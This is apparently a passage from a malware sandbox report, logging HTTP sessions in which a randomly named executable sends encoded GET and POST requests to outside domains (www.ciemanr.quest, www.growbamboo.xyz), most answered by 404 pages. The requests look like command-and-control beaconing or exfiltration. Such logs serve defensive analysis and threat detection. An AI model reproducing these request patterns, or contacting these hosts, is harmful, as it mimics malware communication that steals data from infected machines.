                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.549911150.109.11.247805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:41.243158102 CET504OUTGET /gejp/?LDVlCz=B8lENIMSkdQf4FGQc5K+k257k877TXD8FgVAfBzrbl9XXLWxyw5ahRnSZIhzPxA1TMan6vpZ6mPmpcnGRYODwaH5MOJowBwrmH/nBLcALJg/EQzrJ0QQeK+YBPbGWQ4zHw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.ciemanr.quest
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:19:42.777731895 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tengine
                                                                                  Date: Wed, 11 Dec 2024 23:19:42 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.549929173.208.249.155805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:48.903033972 CET758OUTPOST /1h7d/ HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.growbamboo.xyz
                                                                                  Referer: http://www.growbamboo.xyz/1h7d/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4c 6a 39 30 6d 49 67 56 32 36 46 50 62 78 71 65 78 49 63 6b 42 43 76 32 38 35 75 36 33 74 4a 65 33 34 53 6c 6e 65 5a 69 57 64 52 70 31 70 6a 6a 73 30 4a 46 41 6e 45 34 77 6d 5a 59 50 51 59 78 56 38 4e 44 35 46 30 38 6f 30 6d 77 4e 54 31 56 70 43 37 52 34 57 42 64 6c 57 59 53 6f 53 31 4f 41 48 36 30 30 32 59 34 69 67 4d 75 69 57 72 72 73 64 55 4b 70 69 4d 67 5a 51 75 77 54 75 4d 42 41 58 65 63 4a 5a 6d 68 67 4e 43 2b 74 56 32 55 4d 4e 79 56 2b 44 72 34 49 42 42 4d 73 30 37 6a 78 4d 41 68 37 71 73 77 76 79 62 79 37 4c 44 6a 63 42 54 4e 67 79 36 63 6a 77 52 73 56 35 66 6f 6a 78 4e 47 63 39 63 3d
                                                                                  Data Ascii: LDVlCz=Lj90mIgV26FPbxqexIckBCv285u63tJe34SlneZiWdRp1pjjs0JFAnE4wmZYPQYxV8ND5F08o0mwNT1VpC7R4WBdlWYSoS1OAH6002Y4igMuiWrrsdUKpiMgZQuwTuMBAXecJZmhgNC+tV2UMNyV+Dr4IBBMs07jxMAh7qswvyby7LDjcBTNgy6cjwRsV5fojxNGc9c=
                                                                                  Dec 12, 2024 00:19:50.045525074 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:49 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:50.045655966 CET1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                                                                  Dec 12, 2024 00:19:50.045667887 CET1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                                                                                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                                                                  Dec 12, 2024 00:19:50.046139002 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                                                                  Dec 12, 2024 00:19:50.046154022 CET1236INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                                                                                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                                                                  Dec 12, 2024 00:19:50.046169996 CET1236INData Raw: 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f 44 48 4b 7a 66 4e 45 59 63 6b 34 5a 50 70 35 71 68 35 43 70 34 56 46 69 4c 38
                                                                                  Data Ascii: Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hP
                                                                                  Dec 12, 2024 00:19:50.046181917 CET1236INData Raw: 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f 34 76 6f 63 36 72 5a 6b 41 33 42 70 76 33 6e 6a 66 53 2f 6e 68 52 37 38 31 45 35 34 4e 36 74 34 4f 65 57 78 51 78 75 6b 6e
                                                                                  Data Ascii: DBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5Sf
                                                                                  Dec 12, 2024 00:19:50.046696901 CET145INData Raw: 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 69 6f 6e 20 63 6c 61 73
                                                                                  Data Ascii: e> </head> <body> <div class="container"> <secion class="response-info"> <span class="status-code">
                                                                                  Dec 12, 2024 00:19:50.046706915 CET1236INData Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a
                                                                                  Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 25www.growbamboo.xyz's <a href="mailto
                                                                                  Dec 12, 2024 00:19:50.046716928 CET456INData Raw: 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77
                                                                                  Data Ascii: class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_b


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.549935173.208.249.155805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:51.565583944 CET778OUTPOST /1h7d/ HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.growbamboo.xyz
                                                                                  Referer: http://www.growbamboo.xyz/1h7d/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 4c 6a 39 30 6d 49 67 56 32 36 46 50 55 78 36 65 33 75 55 6b 45 69 76 31 6c 4a 75 36 69 64 4a 53 33 34 75 6c 6e 61 4a 49 57 75 31 70 77 38 6e 6a 71 47 68 46 44 6e 45 34 34 47 5a 52 4c 51 5a 39 56 38 49 2b 35 47 73 38 6f 77 4f 77 4e 53 46 56 70 78 54 53 35 47 42 66 78 6d 59 51 73 53 31 4f 41 48 36 30 30 32 63 57 69 67 45 75 69 6d 62 72 71 38 55 4c 31 79 4d 6a 4f 67 75 77 58 75 4e 47 41 58 65 2b 4a 59 36 4c 67 50 4b 2b 74 55 47 55 4d 63 79 55 30 44 72 2b 47 68 41 59 6e 47 71 4c 2f 76 39 73 35 37 30 79 34 43 44 77 7a 64 79 4a 47 6a 62 6c 7a 53 57 6b 7a 6a 5a 62 45 4a 2b 42 35 53 64 32 43 71 4b 48 78 47 79 44 73 31 66 46 44 54 78 77 57 4d 5a 57 6d 73 35 48
                                                                                  Data Ascii: LDVlCz=Lj90mIgV26FPUx6e3uUkEiv1lJu6idJS34ulnaJIWu1pw8njqGhFDnE44GZRLQZ9V8I+5Gs8owOwNSFVpxTS5GBfxmYQsS1OAH6002cWigEuimbrq8UL1yMjOguwXuNGAXe+JY6LgPK+tUGUMcyU0Dr+GhAYnGqL/v9s570y4CDwzdyJGjblzSWkzjZbEJ+B5Sd2CqKHxGyDs1fFDTxwWMZWms5H
                                                                                  Dec 12, 2024 00:19:52.710707903 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 11 Dec 2024 23:19:52 GMT
                                                                                  Server: Apache
                                                                                  Accept-Ranges: bytes
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                                                                  Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                                                                  Dec 12, 2024 00:19:52.710783005 CET1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                  Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                                                                  Dec 12, 2024 00:19:52.710794926 CET1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                                                                                  Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                                                                  Dec 12, 2024 00:19:52.711070061 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                                                                  Dec 12, 2024 00:19:52.711081028 CET896INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                                                                                  Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                                                                  Dec 12, 2024 00:19:52.711090088 CET1236INData Raw: 49 39 63 63 48 52 43 64 78 55 65 59 61 6e 46 70 51 4a 4d 42 55 44 49 46 78 77 31 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c
                                                                                  Data Ascii: I9ccHRCdxUeYanFpQJMBUDIFxw1chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvN
                                                                                  Dec 12, 2024 00:19:52.711100101 CET1236INData Raw: 33 51 46 59 51 49 52 63 49 33 43 71 32 5a 4e 6b 33 74 59 64 75 75 6e 50 78 49 70 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56
                                                                                  Data Ascii: 3QFYQIRcI3Cq2ZNk3tYduunPxIpus8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFl
                                                                                  Dec 12, 2024 00:19:52.711468935 CET485INData Raw: 62 63 6e 78 70 68 49 45 50 50 6e 68 58 63 39 58 6b 52 4e 75 48 68 33 43 77 38 4a 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67
                                                                                  Data Ascii: bcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; }
                                                                                  Dec 12, 2024 00:19:52.711486101 CET1236INData Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a
                                                                                  Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 25www.growbamboo.xyz's <a href="mailto
                                                                                  Dec 12, 2024 00:19:52.711493969 CET456INData Raw: 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77
                                                                                  Data Ascii: class="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_b


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.549941173.208.249.155805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:19:54.223640919 CET1795OUTPOST /1h7d/ HTTP/1.1
                                                                                  Host: www.growbamboo.xyz
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.growbamboo.xyz
                                                                                  Referer: http://www.growbamboo.xyz/1h7d/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
